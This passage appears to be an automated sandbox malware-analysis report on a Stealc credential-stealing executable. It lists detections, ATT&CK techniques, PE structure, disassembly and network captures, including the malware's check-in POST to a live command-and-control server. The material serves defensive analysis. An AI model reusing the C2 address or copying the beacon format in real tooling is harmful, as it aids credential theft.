                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_007A7A30

                Stealing of Sensitive Information

                Source: Yara match, file source: 0.2.file.exe.790000.0.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000002.1789228980.00000000014AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.1743679514.0000000005160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: Process Memory Space: file.exe PID: 6552, type: MEMORYSTR
                Source: Yara match, file source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match, file source: 0.2.file.exe.790000.0.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000002.1789228980.00000000014AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.1743679514.0000000005160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: Process Memory Space: file.exe PID: 6552, type: MEMORYSTR
                Source: Yara match, file source: dump.pcap, type: PCAP
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                11
                Process Injection
                1
                Masquerading
                OS Credential Dumping2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                2
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                33
                Virtualization/Sandbox Evasion
                LSASS Memory641
                Security Software Discovery
                Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools
                Security Account Manager33
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection
                NTDS13
                Process Discovery
                Distributed Component Object ModelInput Capture12
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                Account Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information
                Cached Domain Credentials1
                System Owner/User Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing
                DCSync1
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc Filesystem324
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Source | Detection | Scanner | Label | Link
                file.exe | 55% | Virustotal | | Browse
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                http://185.215.113.37/ | 100% | URL Reputation | malware |
                http://185.215.113.37 | 100% | URL Reputation | malware |
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware |
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | unknown
                fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | unknown
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/e2b1563c6670f193.phpl | file.exe, 00000000.00000002.1789228980.0000000001509000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37 | file.exe, 00000000.00000002.1789228980.00000000014AE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/9 | file.exe, 00000000.00000002.1789228980.0000000001509000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpT | file.exe, 00000000.00000002.1789228980.0000000001509000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.php( | file.exe, 00000000.00000002.1789228980.0000000001509000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                Joe Sandbox version: 41.0.0 Charoite
                Analysis ID: 1530693
                Start date and time: 2024-10-10 12:04:08 +02:00
                Joe Sandbox product: CloudBasic
                Overall analysis duration: 0h 3m 16s
                Hypervisor based Inspection enabled: false
                Report type: full
                Cookbook file name: default.jbs
                Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of new started processes analysed: 2
                Number of new started drivers analysed: 0
                Number of existing processes analysed: 0
                Number of existing drivers analysed: 0
                Number of injected processes analysed: 0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 80
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated
                            • Exclude process from analysis (whitelisted): SIHClient.exe
                            • Excluded IPs from analysis (whitelisted): 20.109.210.53, 20.242.39.171
                            • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            No simulations
                             Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                             185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                             185.215.113.37 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
                             185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                             185.215.113.37 | zYlQoif21X.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                             185.215.113.37 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
                             185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                             185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                             185.215.113.37 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
                             185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                             185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                             Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                             bg.microsoft.map.fastly.net | https://loadfile.komanda.cl/ | Get hash | malicious | Unknown | Browse | 199.232.210.172
                             bg.microsoft.map.fastly.net | file.exe | Get hash | malicious | Credential Flusher | Browse | 199.232.214.172
                             bg.microsoft.map.fastly.net | https://or4t.iednationusa.com/sYyRdjOU | Get hash | malicious | Unknown | Browse | 199.232.214.172
                             bg.microsoft.map.fastly.net | https://w7950.app.blinkops.com | Get hash | malicious | Unknown | Browse | 199.232.214.172
                             bg.microsoft.map.fastly.net | #U8a62#U50f9 (RFQ) -RFQ20241010.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 199.232.210.172
                             bg.microsoft.map.fastly.net | 5y3FUtMSB5.exe | Get hash | malicious | Quasar | Browse | 199.232.210.172
                             bg.microsoft.map.fastly.net | https://aboriginal-investment-proposal.squarespace.com/ | Get hash | malicious | Unknown | Browse | 199.232.214.172
                             bg.microsoft.map.fastly.net | https://embassyatlantahub.com/res444.php?4-68747470733a2f2f632e7468696d65726e65742e636f6d2f623174462f-#m | Get hash | malicious | Unknown | Browse | 199.232.210.172
                             bg.microsoft.map.fastly.net | http://www.cottesloecounselling.com.au/anna-amhrose.html | Get hash | malicious | Unknown | Browse | 199.232.214.172
                             bg.microsoft.map.fastly.net | https://dlce.cc/fbacdcb212bcbb323077d5a99ef04c07 | Get hash | malicious | Unknown | Browse | 199.232.214.172
                             fp2e7a.wpc.phicdn.net | file.exe | Get hash | malicious | Credential Flusher | Browse | 192.229.221.95
                             fp2e7a.wpc.phicdn.net | http://growthsparkplus.thsite.top/?email=anna@cellnextelecom.com | Get hash | malicious | Unknown | Browse | 192.229.221.95
                             fp2e7a.wpc.phicdn.net | file.exe | Get hash | malicious | Credential Flusher | Browse | 192.229.221.95
                             fp2e7a.wpc.phicdn.net | https://or4t.iednationusa.com/sYyRdjOU | Get hash | malicious | Unknown | Browse | 192.229.221.95
                             fp2e7a.wpc.phicdn.net | https://allpremio.privatepilot.de/allpremio/zdf | Get hash | malicious | Unknown | Browse | 192.229.221.95
                             fp2e7a.wpc.phicdn.net | https://aboriginal-investment-proposal.squarespace.com/ | Get hash | malicious | Unknown | Browse | 192.229.221.95
                             fp2e7a.wpc.phicdn.net | http://blacksaltys.com | Get hash | malicious | Unknown | Browse | 192.229.221.95
                             fp2e7a.wpc.phicdn.net | https://embassyatlantahub.com/res444.php?4-68747470733a2f2f632e7468696d65726e65742e636f6d2f623174462f-#m | Get hash | malicious | Unknown | Browse | 192.229.221.95
                             fp2e7a.wpc.phicdn.net | http://www.cottesloecounselling.com.au/anna-amhrose.html | Get hash | malicious | Unknown | Browse | 192.229.221.95
                             fp2e7a.wpc.phicdn.net | https://dlce.cc/fbacdcb212bcbb323077d5a99ef04c07 | Get hash | malicious | Unknown | Browse | 192.229.221.95
                             Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                             WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                             WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                             WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                             WHOLESALECONNECTIONSNL | zYlQoif21X.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Stealc | Browse | 185.215.113.103
                             WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                             WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                             WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                             WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                             WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                             WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                            No context
                            No context
                            No created / dropped files found
                             File type: PE32 executable (GUI) Intel 80386, for MS Windows
                             Entropy (8bit): 7.949584439885787
                             TrID:
                             • Win32 Executable (generic) a (10002005/4) 99.96%
                             • Generic Win/DOS Executable (2004/3) 0.02%
                             • DOS Executable Generic (2002/1) 0.02%
                             • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                             File name: file.exe
                             File size: 1'860'096 bytes
                             MD5: 6a6d66291698792c3e6764ec5dd4e0ff
                             SHA1: dd9d3a54a2016c6b6e049f43fca9fcccedc89493
                             SHA256: 0daf657523ba709f5c99af228de6b06699c6ddba2bfc4be766baae3027740602
                             SHA512: 901f9a0bd145d3fd2dd39abd7a82ca3af3c5e2767ec92b3c23dbd4f3b507f0222a667ab37c8673e76029b3fb5d655164356afa6d3409c53f5b320ec0b9d54908
                             SSDEEP: 49152:ppTh0S9sfMyzc71ONaO+ppKdXQTqpRKK:ppN0S9sRc78IBp33
                             TLSH: FD85331D8CDDC5B2D88AF87E9AA30B5B8F049FB1A5D0E7466817046D686FC18A3F13D1
                             File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                             Icon Hash: 90cececece8e8eb0
                             Entrypoint: 0xaa0000
                             Entrypoint Section: .taggant
                             Digitally signed: false
                             Imagebase: 0x400000
                             Subsystem: windows gui
                             Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
                             DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                             Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                             TLS Callbacks:
                             CLR (.Net) Version:
                             OS Version Major: 5
                             OS Version Minor: 1
                             File Version Major: 5
                             File Version Minor: 1
                             Subsystem Version Major: 5
                             Subsystem Version Minor: 1
                             Import Hash: 2eabe9054cad5152567f0699947a2c5b
                            Instruction
                            jmp 00007FB9B07E303Ah
                            cmovo ebx, dword ptr [eax+eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            jmp 00007FB9B07E5035h
                            add byte ptr [edx+ecx], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax], eax
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            or al, 80h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add al, 0Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            or byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            and al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax+00000000h], eax
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add al, 0Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax+00000000h], eax
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [edx], ecx
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            inc eax
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax+eax*4], cl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
                             Name | Virtual Address | Virtual Size | Is in Section
                             IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                             IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                             IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                             Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                             (unnamed) | 0x1000 | 0x25b000 | 0x22800 | 4c43f8ce20574c250ee74f71fdf10feb | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             (unnamed) | 0x25e000 | 0x2a1000 | 0x200 | 7ba9eb7fdeb80c88d79451c0305218a0 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             vppxldjh | 0x4ff000 | 0x1a0000 | 0x19fe00 | ae1dbddbc3aa9255a3504875243468a3 | False | 0.9950000704463481 | data | 7.954340444718931 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             xcnejhbt | 0x69f000 | 0x1000 | 0x600 | d855dd6605553dff179340b91c34dc11 | False | 0.5846354166666666 | data | 5.049353171576456 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             .taggant | 0x6a0000 | 0x3000 | 0x2200 | f232d6e58102f6ac3a0970d887f17cd3 | False | 0.05767463235294118 | DOS executable (COM) | 0.6847144094131307 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             DLL | Import
                             kernel32.dll | lstrcpy
                             Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                             2024-10-10T12:05:09.806519+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP
                             Timestamp | Source Port | Dest Port | Source IP | Dest IP
                             Oct 10, 2024 12:05:08.782653093 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                             Oct 10, 2024 12:05:08.787868023 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                             Oct 10, 2024 12:05:08.787975073 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                             Oct 10, 2024 12:05:08.788101912 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                             Oct 10, 2024 12:05:08.792913914 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                             Oct 10, 2024 12:05:09.497402906 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                             Oct 10, 2024 12:05:09.497935057 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                             Oct 10, 2024 12:05:09.575400114 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                             Oct 10, 2024 12:05:09.580461025 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                             Oct 10, 2024 12:05:09.806205034 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                             Oct 10, 2024 12:05:09.806519032 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                             Oct 10, 2024 12:05:14.107316971 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                             Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                             Oct 10, 2024 12:05:21.216856956 CEST | 1.1.1.1 | 192.168.2.4 | 0xbbf9 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                             Oct 10, 2024 12:05:21.216856956 CEST | 1.1.1.1 | 192.168.2.4 | 0xbbf9 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                             Oct 10, 2024 12:05:22.528201103 CEST | 1.1.1.1 | 192.168.2.4 | 0x1a89 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                             Oct 10, 2024 12:05:22.528201103 CEST | 1.1.1.1 | 192.168.2.4 | 0x1a89 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                            • 185.215.113.37
                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                             0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 6552 | C:\Users\user\Desktop\file.exe
                             Timestamp | Bytes transferred | Direction | Data
                             Oct 10, 2024 12:05:08.788101912 CEST | 89 | OUT | GET / HTTP/1.1
                             Host: 185.215.113.37
                             Connection: Keep-Alive
                             Cache-Control: no-cache
                             Oct 10, 2024 12:05:09.497402906 CEST | 203 | IN | HTTP/1.1 200 OK
                             Date: Thu, 10 Oct 2024 10:05:09 GMT
                             Server: Apache/2.4.52 (Ubuntu)
                             Content-Length: 0
                             Keep-Alive: timeout=5, max=100
                             Connection: Keep-Alive
                             Content-Type: text/html; charset=UTF-8
                             Oct 10, 2024 12:05:09.575400114 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                             Content-Type: multipart/form-data; boundary=----AAFBAKECAEGCBFIEGDGI
                             Host: 185.215.113.37
                             Content-Length: 211
                             Connection: Keep-Alive
                             Cache-Control: no-cache
                             Data Raw: 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 33 45 38 30 35 35 32 44 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 2d 2d 0d 0a
                             Data Ascii (CRLF line breaks restored from the raw bytes):
                             ------AAFBAKECAEGCBFIEGDGI
                             Content-Disposition: form-data; name="hwid"

                             443E80552D561166170430
                             ------AAFBAKECAEGCBFIEGDGI
                             Content-Disposition: form-data; name="build"

                             doma
                             ------AAFBAKECAEGCBFIEGDGI--
                             Oct 10, 2024 12:05:09.806205034 CEST | 210 | IN | HTTP/1.1 200 OK
                             Date: Thu, 10 Oct 2024 10:05:09 GMT
                             Server: Apache/2.4.52 (Ubuntu)
                             Content-Length: 8
                             Keep-Alive: timeout=5, max=99
                             Connection: Keep-Alive
                             Content-Type: text/html; charset=UTF-8
                             Data Raw: 59 6d 78 76 59 32 73 3d
                             Data Ascii: YmxvY2s=



                             Target ID: 0
                             Start time: 06:05:03
                             Start date: 10/10/2024
                             Path: C:\Users\user\Desktop\file.exe
                             Wow64 process (32bit): true
                             Commandline: "C:\Users\user\Desktop\file.exe"
                             Imagebase: 0x790000
                             File size: 1'860'096 bytes
                             MD5 hash: 6A6D66291698792C3E6764EC5DD4E0FF
                             Has elevated privileges: true
                             Has administrator privileges: true
                             Programmed in: C, C++ or other language
                             Yara matches:
                             • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                             • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1789228980.00000000014AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                             • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1743679514.0000000005160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                             Reputation: low
                             Has exited: true


                              Execution Graph

                               Execution Coverage: 8.8%
                               Dynamic/Decrypted Code Coverage: 0%
                               Signature Coverage: 9.7%
                               Total number of Nodes: 2000
                               Total number of Limit Nodes: 24
                              execution_graph 13184 7a69f0 13229 792260 13184->13229 13208 7a6a64 13209 7aa9b0 4 API calls 13208->13209 13210 7a6a6b 13209->13210 13211 7aa9b0 4 API calls 13210->13211 13212 7a6a72 13211->13212 13213 7aa9b0 4 API calls 13212->13213 13214 7a6a79 13213->13214 13215 7aa9b0 4 API calls 13214->13215 13216 7a6a80 13215->13216 13381 7aa8a0 13216->13381 13218 7a6b0c 13385 7a6920 GetSystemTime 13218->13385 13220 7a6a89 13220->13218 13222 7a6ac2 OpenEventA 13220->13222 13224 7a6ad9 13222->13224 13225 7a6af5 CloseHandle Sleep 13222->13225 13228 7a6ae1 CreateEventA 13224->13228 13226 7a6b0a 13225->13226 13226->13220 13228->13218 13582 7945c0 13229->13582 13231 792274 13232 7945c0 2 API calls 13231->13232 13233 79228d 13232->13233 13234 7945c0 2 API calls 13233->13234 13235 7922a6 13234->13235 13236 7945c0 2 API calls 13235->13236 13237 7922bf 13236->13237 13238 7945c0 2 API calls 13237->13238 13239 7922d8 13238->13239 13240 7945c0 2 API calls 13239->13240 13241 7922f1 13240->13241 13242 7945c0 2 API calls 13241->13242 13243 79230a 13242->13243 13244 7945c0 2 API calls 13243->13244 13245 792323 13244->13245 13246 7945c0 2 API calls 13245->13246 13247 79233c 13246->13247 13248 7945c0 2 API calls 13247->13248 13249 792355 13248->13249 13250 7945c0 2 API calls 13249->13250 13251 79236e 13250->13251 13252 7945c0 2 API calls 13251->13252 13253 792387 13252->13253 13254 7945c0 2 API calls 13253->13254 13255 7923a0 13254->13255 13256 7945c0 2 API calls 13255->13256 13257 7923b9 13256->13257 13258 7945c0 2 API calls 13257->13258 13259 7923d2 13258->13259 13260 7945c0 2 API calls 13259->13260 13261 7923eb 13260->13261 13262 7945c0 2 API calls 13261->13262 13263 792404 13262->13263 13264 7945c0 2 API calls 13263->13264 13265 79241d 13264->13265 13266 7945c0 2 API calls 13265->13266 13267 792436 13266->13267 13268 7945c0 2 API calls 13267->13268 13269 79244f 13268->13269 13270 7945c0 2 API calls 13269->13270 